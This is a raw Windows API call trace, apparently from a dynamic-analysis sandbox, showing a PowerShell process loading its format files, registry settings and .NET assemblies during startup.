	[0763.382] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0763.382] GetFileType (hFile=0x310) returned 0x1
	[0763.382] SetErrorMode (uMode=0x1) returned 0x1
	[0763.382] GetFileType (hFile=0x310) returned 0x1
	[0763.382] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.382] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.383] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.383] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.383] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.383] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0763.383] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0xaca, lpOverlapped=0x0) returned 1
	[0763.383] ReadFile (in: hFile=0x310, lpBuffer=0x31ce16a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ce16a*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0763.383] ReadFile (in: hFile=0x310, lpBuffer=0x31ceb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x31ceb38*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0763.384] CloseHandle (hObject=0x310) returned 1
	[0763.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.384] SetErrorMode (uMode=0x1) returned 0x1
	[0763.384] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d0e0 | out: lpFileInformation=0x20d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0763.384] SetErrorMode (uMode=0x1) returned 0x1
	[0763.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.384] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0763.384] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0763.384] CoTaskMemAlloc (cb=0x5a) returned 0x4f2bd0
	[0763.384] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x4f2bd0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0763.384] CoTaskMemFree (pv=0x4f2bd0) 
	[0763.385] RegCloseKey (hKey=0x310) returned 0x0
	[0763.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0763.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0763.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0763.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0764.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0764.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0764.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0764.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0764.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0764.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0764.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0764.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0764.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0764.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0764.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x20c650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0764.559] VirtualQuery (in: lpAddress=0x20bc60, lpBuffer=0x20cb20, dwLength=0x30 | out: lpBuffer=0x20cb20*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0764.560] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xac4b6149, Data2=0x9fc2, Data3=0x4de4, Data4=([0]=0x8b, [1]=0xbd, [2]=0x25, [3]=0xd0, [4]=0xfa, [5]=0xf8, [6]=0x5b, [7]=0xc5))) returned 0x0
	[0764.561] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xdd7d272e, Data2=0x46be, Data3=0x4585, Data4=([0]=0xaf, [1]=0x33, [2]=0x97, [3]=0x24, [4]=0x5d, [5]=0x8e, [6]=0xf0, [7]=0xc3))) returned 0x0
	[0764.562] VirtualQuery (in: lpAddress=0x20be10, lpBuffer=0x20ccd0, dwLength=0x30 | out: lpBuffer=0x20ccd0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0764.563] VirtualQuery (in: lpAddress=0x20be10, lpBuffer=0x20ccd0, dwLength=0x30 | out: lpBuffer=0x20ccd0*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0764.564] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x2c3ce768, Data2=0x445c, Data3=0x41b0, Data4=([0]=0xba, [1]=0x55, [2]=0x2c, [3]=0x9, [4]=0xfd, [5]=0xd3, [6]=0xc4, [7]=0x5c))) returned 0x0
	[0765.842] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x4f43dc03, Data2=0xfc45, Data3=0x49e8, Data4=([0]=0x96, [1]=0x63, [2]=0x33, [3]=0x5f, [4]=0x3b, [5]=0x1b, [6]=0xbf, [7]=0x65))) returned 0x0
	[0765.842] VirtualQuery (in: lpAddress=0x20c060, lpBuffer=0x20cf20, dwLength=0x30 | out: lpBuffer=0x20cf20*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.843] VirtualQuery (in: lpAddress=0x20bda0, lpBuffer=0x20cc60, dwLength=0x30 | out: lpBuffer=0x20cc60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.844] VirtualQuery (in: lpAddress=0x20bda0, lpBuffer=0x20cc60, dwLength=0x30 | out: lpBuffer=0x20cc60*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.845] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x2c4da3c5, Data2=0x11e9, Data3=0x4a03, Data4=([0]=0xb1, [1]=0x7f, [2]=0x52, [3]=0x25, [4]=0x41, [5]=0x4e, [6]=0xba, [7]=0x4f))) returned 0x0
	[0765.845] VirtualQuery (in: lpAddress=0x20c060, lpBuffer=0x20cf20, dwLength=0x30 | out: lpBuffer=0x20cf20*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.846] VirtualQuery (in: lpAddress=0x20be80, lpBuffer=0x20cd40, dwLength=0x30 | out: lpBuffer=0x20cd40*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.847] VirtualQuery (in: lpAddress=0x20b6d0, lpBuffer=0x20c590, dwLength=0x30 | out: lpBuffer=0x20c590*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.848] VirtualQuery (in: lpAddress=0x20b6d0, lpBuffer=0x20c590, dwLength=0x30 | out: lpBuffer=0x20c590*(BaseAddress=0x20b000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0765.848] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x470e49e2, Data2=0x1e, Data3=0x4839, Data4=([0]=0x94, [1]=0xff, [2]=0xc8, [3]=0x97, [4]=0xd2, [5]=0x56, [6]=0x2f, [7]=0xfc))) returned 0x0
	[0765.849] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x21de8b27, Data2=0xb4a6, Data3=0x4575, Data4=([0]=0xb1, [1]=0x38, [2]=0x60, [3]=0x6, [4]=0x8d, [5]=0xc4, [6]=0xe3, [7]=0x4d))) returned 0x0
	[0765.849] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0765.849] GetFileType (hFile=0x310) returned 0x1
	[0765.849] SetErrorMode (uMode=0x1) returned 0x1
	[0765.849] GetFileType (hFile=0x310) returned 0x1
	[0765.849] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.849] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.850] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.850] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.850] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.850] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.850] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.851] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.852] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.853] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.853] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0765.854] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0766.051] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0766.052] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0766.052] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0766.052] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0766.056] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x1000, lpOverlapped=0x0) returned 1
	[0766.056] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0xbce, lpOverlapped=0x0) returned 1
	[0766.056] ReadFile (in: hFile=0x310, lpBuffer=0x3280866, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3280866*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0766.056] ReadFile (in: hFile=0x310, lpBuffer=0x3281130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d138, lpOverlapped=0x0 | out: lpBuffer=0x3281130*, lpNumberOfBytesRead=0x20d138*=0x0, lpOverlapped=0x0) returned 1
	[0766.057] CloseHandle (hObject=0x310) returned 1
	[0766.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.057] SetErrorMode (uMode=0x1) returned 0x1
	[0766.057] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d0e0 | out: lpFileInformation=0x20d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0766.057] SetErrorMode (uMode=0x1) returned 0x1
	[0766.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.058] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d1c8 | out: phkResult=0x20d1c8*=0x310) returned 0x0
	[0766.058] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d14c, lpData=0x0, lpcbData=0x20d148*=0x0 | out: lpType=0x20d14c*=0x1, lpData=0x0, lpcbData=0x20d148*=0x56) returned 0x0
	[0766.058] CoTaskMemAlloc (cb=0x5a) returned 0x1b8560b0
	[0766.058] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d11c, lpData=0x1b8560b0, lpcbData=0x20d118*=0x56 | out: lpType=0x20d11c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d118*=0x56) returned 0x0
	[0766.058] CoTaskMemFree (pv=0x1b8560b0) 
	[0766.058] RegCloseKey (hKey=0x310) returned 0x0
	[0766.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x20ccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0766.059] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x9d394a09, Data2=0xd3f5, Data3=0x4c5c, Data4=([0]=0x94, [1]=0xaf, [2]=0x3b, [3]=0x8b, [4]=0x1a, [5]=0x26, [6]=0x9, [7]=0x8a))) returned 0x0
	[0766.060] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0xabbd044f, Data2=0x75de, Data3=0x448f, Data4=([0]=0xbc, [1]=0xd6, [2]=0x27, [3]=0x5a, [4]=0xde, [5]=0xcf, [6]=0xb2, [7]=0xbb))) returned 0x0
	[0766.060] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x4b530cfe, Data2=0x780e, Data3=0x4f2e, Data4=([0]=0x8a, [1]=0x32, [2]=0x4, [3]=0x8a, [4]=0xf4, [5]=0xa4, [6]=0x84, [7]=0x3a))) returned 0x0
	[0766.060] CoCreateGuid (in: pguid=0x20d3f0 | out: pguid=0x20d3f0*(Data1=0x1e195c8e, Data2=0x7c0c, Data3=0x4779, Data4=([0]=0xb0, [1]=0x57, [2]=0x6a, [3]=0x10, [4]=0xeb, [5]=0xd9, [6]=0xd3, [7]=0xca))) returned 0x0
